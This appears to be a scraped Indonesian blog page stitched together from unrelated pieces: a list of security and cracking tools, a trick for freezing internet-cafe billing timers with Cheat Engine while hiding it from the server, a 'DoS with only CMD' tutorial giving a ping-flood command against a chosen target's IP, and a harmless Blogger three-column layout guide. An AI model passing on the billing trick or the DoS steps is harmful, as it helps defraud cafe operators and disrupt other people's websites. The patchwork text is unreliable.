–rarcrack
–wyd
Offline Attack
–Rainbowcrack
–rainbowcrack
–rainbowcrack GUI
–rtgen
–rtsort

chntpw
crunch
john
ophcrack
pw-inspector
samdump2
wyd

Online Attack
hydra
lodowep
medusa
SSHatter
tftp-bruteforce
Sniffers
arpalert
Driftnet
dsniff
EtherApe (as root)
ettercap
fimap
ssldump
sslscan
sslstrip
tcpick
Wireshark
Spoofing
EtherApe (as root)
ettercap
icmpush
netenum
PackETH
packit
scapy
ssldump
sslstrip
tcpreplay
Connect & Access
3proxy
cryptcat
dns2tcp
miredo
miredo-server
nstx
proxychains
ptunnel
socat
stunnel4
tinyproxy
udptunnel
Anonymity
Tor Browser
Wireless & Bluetooth
802.11
Analysing
Kismet
weplab
WiFi Radar
Cracking
aircrack-ng suite
airbase-ng
aircrack-ng
airdecap-ng
airdecloak-ng
airdriver-ng
aireplay-ng
airmon-ng
airodump-ng
airolib-ng
airpwn-ng
airserv-ng
airtun-ng
easside-ng
packetforge-ng
tkiptun-ng
wesside-ng
–WifiZoo
–wifizoo
–wifizoo webGUI

airsnarf
asleap
cowpatty
evilapcrt
genpmk
Kismet
pyrit

Spoofing
aircrack-ng suite
airbase-ng
aircrack-ng
airdecap-ng
airdecloak-ng
airdriver-ng
aireplay-ng
airmon-ng
airodump-ng
airolib-ng
airpwn-ng
airserv-ng
airtun-ng
easside-ng
packetforge-ng
tkiptun-ng
wesside-ng
wifizoo
Misc
macchanger
macchanger-gtk
Spectrum Tool – WiSpy
wavemon
Bluetooth
bluebugger
blueprint
btscanner
hcidump
minicom
obexftp
ussp-push
Rfid
RFIDIOt suite

ini adalah trik untuk menghentikan billing yang biasa ada diwarnet.
bisa dilambatin sma bisa diberhentiin .
pakai Cheat Engine v5.3

Untuk Download Tutorialnya KLIK DISINI

Diupload tgl: 20/02/08 Size: 186.82MB

Vurln nya di sinkronisasi waktu server sama client,
karna
Client > Server
kalo klien waktunya berhenti / lambat di server pun juga gitu .

cara, tapi jng ketahuan servernya ya ??
1. SETELAH PAKAI CHEAT ENGINE DAN WAKTU BERHENTI / LAMBAT
2. SETELAH PUAS MAIN
3. RESTARTTTT!! DENGAN TOMBOL PANIC.

coba aja !!
Untuk Download Cheat Enginenya Klik DISINI

setelah itu cari cheat engine v5.3 .

‎
Hello guys, today i will show you how to find a website's IP address and DoS them using only CMD. What is a Denial of Service Attack?-Basically all this is does is floods of a network to prevent its operation, preventing access to a particular service
Obstruction of access to a service to a particular person.
Once you've got the website's IP address by pinging it, you need to follow these simple steps below.

1. Open CMD by going into run and typing CMD

2. Get the IP of the guy you wish to DoS, in this case we are using this : 5.2I.0.0(random IP)

3. So you would type this in ur CMD: ping 5.2I.0.0 -t -l 14000 (The higher the longer & The more damage done)

4. You have sucesfully DoS'd ur target! just alow it to finish (may take a while).

[Tutorial hari ini]Bagaimana untuk DoS menggunakan hanya CMD (Prompt Perintah) dan ini adalah murni untuk belajar tujuan hanya. TIDAK MELAKUKANNYA UNTUK MERUGIKAN BANGSA LAIN WEBSITE.!!
Halo guys, hari ini saya akan menunjukkan Anda bagaimana untuk menemukan sebuah website alamat IP dan DoS mereka menggunakan hanya CMD. Apakah Denial of Service serangan?-pada dasarnya melakukan semua ini adalah banjir jaringan untuk mencegah operasinya, mencegah akses ke layanan tertentu terhalangnya akses ke layanan ke orang tertentu.
Setelah Anda punya alamat IP website ping itu, Anda perlu mengikuti langkah-langkah sederhana di bawah ini.

1. Buka CMD dengan pergi ke jalankan dan mengetik CMD 2. Mendapatkan IP dari orang yang Anda ingin DoS, dalam hal ini kami menggunakan ini: 5.2I.0.0(random IP) 3. Jadi Anda akan mengetikkan ini ur CMD: ping 5.2I.0.0 -t -l 14000 (semakin tinggi lagi & lebih banyak kerusakan) 4. Anda memiliki sucesfully DoS memiliki ur target! alow hanya untuk menyelesaikan (mungkin berlangsung agak lam

Yuk kita pelajari bareng trik membuat blog menjadi 3 kolom dengan kolom postingan ditengah...


Pertama, sedikit Ayas jelasin tentang layout blog secara umum (standart), sekilas bisa dilihat seperti gambar dibawah ini, beserta penjelasannya :

• Yang berwarna putih adalah 'Body'
• Berwarna kuning, disebut dengan 'outer-wrapper'
• Warna biru adalah 'Header'
• Warna merah adalah 'Main-wrapper', tempat postingan kita berada.
• Warna hijau adalah 'Sidebar'
• Terakhir, warna hitam adalah footer

Mari mulai mengedit. Silahkan menuju halaman 'Tata Letak' - 'Edit HTML'.

Yang pertama harus kita lakukan adalah mendownload template Sodara, agar jika terjadi kesalahan masih bisa di kembalikan seperti semula. Cara untuk mendownload/backup template bisa Sodara baca disini.

Sebelum kita membuat blog kita menjadi 3 kolom, kita harus tau dulu berapa lebar keseluruhan Outer-wrapper, karena outer-wrapper adalah tempat dimana main-wrapper (kolom postingan) dan sidebar berada.

Untuk mengetahui berapa lebar outer-wrapper, cari kode berikut (biasanya seperti ini) :

#outer-wrapper

Dibawahnya ada detail tentang outer-wrapper itu, misalkan :

#outer-wrapper {
width: 660px;
margin:0 auto;
padding:10px;
text-align:$startSide;
font: $bodyfont;
}

Nah, width adalah lebar keseluruhan outer-wrapper. Width outer-wrapper inilah yang akan kita jadikan dasar untuk menentukan ukuran masing 2 sidebar dan kolom postingan.

Jika terlalu kecil, silahkan ubah width nya, misalkan kita ganti dengan 900px.

Jangan lupa juga untuk menyesuaikan lebar header dan footer agar sama, ganti dengan 900px juga.

Selanjutnya, karena kita akan membuat 3 kolom - kolom posting dan 2 kolom sidebar - maka kita bagi 900px untuk 3 kolom tersebut.

Misalkan, kita coba bagi 450px untuk kolom posting, 200px untuk masing-masing 2 kolom sidebar kita. Sisanya, 50px kita sediakan untuk jarak antar kolom.

Langkah selanjutnya adalah mengganti lebar masing2 kolom.

1. Kolom Posting

Cari kode :

#main-wrapper {
width: 410px;
float: $startSide;
word-wrap: break-word; /* fix for long text breaking sidebar float in IE */
overflow: hidden; /* fix for long non-text content breaking IE sidebar float */
}

Ganti widthnya dengan 450px.

2. Kolom sidebar
Cari kode :

#sidebar-wrapper {
width: 220px;
float: $endSide;
word-wrap: break-word; /* fix for long text breaking sidebar float in IE */
overflow: hidden; /* fix for long non-text content breaking IE sidebar float */
}

Ganti width dengan 200px

Nah, sekarang waktunya untuk menambah 1 element untuk sidebar baru kita.

Caranya, tinggal copy kode berikut, lalu paste di atas kode #main-wrapper :

#sidebar2-wrapper {
width: 200px;
float: left;
margin-right:10px;
word-wrap: break-word; /* fix for long text breaking sidebar float in IE */
overflow: hidden; /* fix for long non-text content breaking IE sidebar float */
}

Pemberian angka '2' untuk membedakan dengan sidebar yang sudah ada.

Selanjutnya, copy kode berikut :

<div id='sidebar2-wrapper'>

<b:section class='sidebar' id='sidebar2' preferred='yes'>
</b:section>

</div>

Kemudian paste di ATAS kode :

<div id='main-wrapper'>

Coba save, lalu pindah ke halaman 'Tata Letak' / 'Layout' - 'Element Halaman' / 'Page Element'.

Sekarang Sodara bisa lihat, sudah ada 1 element halaman baru tercipta. Coba isi element halaman baru tersebut dengan text ato logo (klik aja 'Add Gadget' / 'Tambah Gadget'), misalnya. Kemudian save, lalu preview.

Nah, bisa kita lihat hasilnya.

Sudah jadikan blog 3 kolom dengan kolom postingan berada ditengah, diantara 2 sidebar?